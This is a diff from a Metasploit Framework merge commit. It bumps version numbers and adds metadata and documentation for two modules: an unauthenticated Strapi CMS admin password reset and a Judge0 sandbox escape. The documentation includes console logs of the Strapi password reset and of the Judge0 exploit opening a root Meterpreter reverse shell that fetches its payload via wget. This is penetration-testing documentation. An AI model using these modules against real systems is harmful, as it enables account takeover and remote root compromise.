Merge remote-tracking branch 'upstream/master'

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (6.4.37)
+    metasploit-framework (6.4.38)
       aarch64
       abbrev
       actionpack (~> 7.0.0)

LICENSE_GEMS

@@ -88,7 +88,7 @@ memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.3, "New BSD"
 metasploit-credential, 6.0.11, "New BSD"
-metasploit-framework, 6.4.37, "New BSD"
+metasploit-framework, 6.4.38, "New BSD"
 metasploit-model, 5.0.2, "New BSD"
 metasploit-payloads, 2.0.187, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.5, "New BSD"
@@ -156,7 +156,7 @@ rex-mime, 0.1.8, "New BSD"
 rex-nop, 0.1.3, "New BSD"
 rex-ole, 0.1.8, "New BSD"
 rex-powershell, 0.1.100, "New BSD"
-rex-random_identifier, 0.1.12, "New BSD"
+rex-random_identifier, 0.1.13, "New BSD"
 rex-registry, 0.1.5, "New BSD"
 rex-rop_builder, 0.1.5, "New BSD"
 rex-socket, 0.1.57, "New BSD"
@@ -181,7 +181,7 @@ ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.10, "New BSD"
+ruby_smb, 3.3.11, "New BSD"
 rubyntlm, 0.6.5, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT

db/modules_metadata_base.json

@@ -41980,6 +41980,70 @@
 
     ]
   },
+  "auxiliary_scanner/http/strapi_3_password_reset": {
+    "name": "Strapi CMS Unauthenticated Password Reset",
+    "fullname": "auxiliary/scanner/http/strapi_3_password_reset",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-02-09",
+    "type": "auxiliary",
+    "author": [
+      "WackyH4cker",
+      "h00die"
+    ],
+    "description": "This module abuses the mishandling of a password reset request for\n          Strapi CMS version 3.0.0-beta.17.4 to change the password of the admin user.\n\n          Successfully tested against Strapi CMS version 3.0.0-beta.17.4.",
+    "references": [
+      "URL-https://vulners.com/cve/CVE-2019-18818",
+      "URL-https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.4",
+      "URL-https://github.com/strapi/strapi/pull/4443",
+      "CVE-2019-18818",
+      "EDB-50716"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-11-16 15:47:54 +0000",
+    "path": "/modules/auxiliary/scanner/http/strapi_3_password_reset.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/strapi_3_password_reset",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
   "auxiliary_scanner/http/support_center_plus_directory_traversal": {
     "name": "ManageEngine Support Center Plus Directory Traversal",
     "fullname": "auxiliary/scanner/http/support_center_plus_directory_traversal",
@@ -75813,6 +75877,69 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_linux/http/judge0_sandbox_escape_cve_2024_28189": {
+    "name": "Judge0 sandbox escape",
+    "fullname": "exploit/linux/http/judge0_sandbox_escape_cve_2024_28189",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-04",
+    "type": "exploit",
+    "author": [
+      "Tanto Security",
+      "Takahiro Yokoyama"
+    ],
+    "description": "Judge0 does not account for symlinks placed inside the sandbox directory,\n          which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.",
+    "references": [
+      "CVE-2024-28185",
+      "CVE-2024-28189",
+      "URL-https://tantosec.com/blog/judge0/"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 2358,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Command"
+    ],
+    "mod_time": "2024-10-23 07:29:21 +0000",
+    "path": "/modules/exploits/linux/http/judge0_sandbox_escape_cve_2024_28189.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/judge0_sandbox_escape_cve_2024_28189",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "config-changes",
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
   "exploit_linux/http/kafka_ui_unauth_rce_cve_2023_52251": {
     "name": "Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.",
     "fullname": "exploit/linux/http/kafka_ui_unauth_rce_cve_2023_52251",

documentation/modules/auxiliary/scanner/http/strapi_3_password_reset.md

@@ -0,0 +1,59 @@
+## Vulnerable Application
+
+This module abuses the mishandling of a password reset request for 
+Strapi CMS version 3.0.0-beta.17.4 to change the password of the admin user.
+
+Successfully tested against Strapi CMS version 3.0.0-beta.17.4.
+
+### Install
+
+
+```
+docker run -it -p 1337:1337 --rm node:16 /bin/bash
+export CXXFLAGS="-std=c++17"
+# Complete the quickstart
+npm install -g [email protected] && create-strapi-app yourProjectName
+```
+
+Navigate to http://localhost:1337/ to verify the application is running. Now create the first admin account at http://localhost:1337/admin
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/strapi_3_password_reset`
+1. Do: `set new_password testtesttest`
+1. Do: `set rport 1337`
+1. Do: `set rhosts 127.0.0.1`
+1. Do: `run`
+1. You should be able to reset the admin users password
+
+## Options
+
+### NEW_PASSWORD
+
+New Admin password. No default.
+
+## Scenarios
+
+### npx install of strapi 3.0.0-beta.17.4
+
+```
+msf6 > use auxiliary/scanner/http/strapi_3_password_reset
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > set new_password testtesttest
+new_password => testtesttest
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > set rport 1337
+rport => 1337
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > check
+[-] This module does not support check.
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > run
+
+[*] Resetting admin password...
+[+] Password changed successfully!
+[+] User: superadminuser
+[+] Email: [email protected]
+[+] PASSWORD: testtesttest
+[*] Auxiliary module execution completed
+```

documentation/modules/exploit/linux/http/judge0_sandbox_escape_cve_2024_28189.md

@@ -0,0 +1,121 @@
+## Vulnerable Application
+
+Judge0 does not account for symlinks placed inside the sandbox directory,
+which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
+
+The vulnerability affects:
+
+    * Judge0 <= 1.13.0
+
+This module was successfully tested on:
+
+    * Judge0(v1.13.0) installed with Docker on Ubuntu 20.0.4
+
+
+### Installation
+
+1. (Optional) Set cgroup to v1
+```bash
+  sudo nano /etc/default/grub
+  # add this line at the top, and save:
+  GRUB_CMDLINE_LINUX="systemd.unified_cgroup_hierarchy=0"
+  sudo update-grub
+  sudo reboot
+```
+
+2. Install Judge0
+```bash
+  wget https://github.com/judge0/judge0/releases/download/v1.13.0/judge0-v1.13.0.zip
+  unzip judge0-v1.13.0.zip
+  cd judge0-v1.13.0
+```
+
+3. Start Judge0
+```bash
+  docker compose up
+```
+
+4. (Optional) When Judge0 does not work, try this
+```bash
+  docker compose up --force-recreate server
+```
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/judge0_sandbox_escape_cve_2024_28189`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/judge0_sandbox_escape_cve_2024_28189
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/judge0_sandbox_escape_cve_2024_28189) > options
+
+Module options (exploit/linux/http/judge0_sandbox_escape_cve_2024_28189):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    2358             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      JRzyWcrcJ        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST                                yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/judge0_sandbox_escape_cve_2024_28189) > run lhost=192.168.56.1 rhost=192.168.56.15
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Version 1.13.0 detected, which is vulnerable
+[+] The target appears to be vulnerable.
+[*] Writing cron job to /etc/cron.d/dUTuziNy
+[*] Use language: 77, COBOL (GnuCOBOL 2.2)
+[+] Deleted /etc/cron.d/dUTuziNy
+[+] Deleted /root/SVENuNNy
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.15:49024) at 2024-10-29 12:56:04 +0900
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.18.0.5
+OS           : Debian 10.2 (Linux 5.4.0-196-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/root
+meterpreter > 
+```

lib/metasploit/framework/version.rb

@@ -32,7 +32,7 @@ def self.get_hash
         end
       end
 
-      VERSION = "6.4.37"
+      VERSION = "6.4.38"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash